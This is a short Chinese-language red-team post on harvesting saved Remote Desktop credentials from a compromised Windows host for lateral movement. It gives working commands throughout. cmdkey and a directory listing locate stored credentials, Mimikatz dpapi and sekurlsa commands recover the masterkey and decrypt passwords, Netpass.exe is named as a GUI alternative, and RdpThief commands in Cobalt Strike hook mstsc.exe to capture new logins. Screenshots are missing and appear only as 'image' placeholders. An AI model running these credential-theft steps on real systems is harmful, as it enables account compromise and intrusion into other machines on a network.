0x00 简介
就是利用RDP协议远程连接其他机器的密码。
image
0x01 获取保存的RDP凭据
在获取一台机器管理员权限后,可以查看本地是否保存了 RDP 密码,然后解密尝试用于横向。
查看保存的远程主机信息(该命令需要在用户 session 下执行)
cmdkey /list
image
1. Mimikatz
本地的凭据
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
image
选择一个开始进行解密,这里需要记录 guidMasterKey
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\{用户名}\AppData\Local\Microsoft\Credentials\{session}"
image
找到对应的 Masterkey
sekurlsa::dpapi
image
用密钥来进行解密指定的凭据,成功解出密码
dpapi::cred /in:C:\Users\{用户名}\AppData\Local\Microsoft\Credentials\{session} /masterkey:{masterkey}
image
后面,懂得都懂
2. Netpass.exe
界面化工具
image
0x02 HOOK RDP 凭据
直接用工具,原理建议看 作者原文
启动心跳检测,检查新的mstsc.exe进程,执行注入操作
rdpthief_enable
image
模拟管理员进行远程登录
image
停止心跳检测
rdpthief_disable
查看结果
rdpthief_dump
我的cs有点奇怪。。。。
image
还是导出来看吧,在 %temp%\data.bin 里
image.png
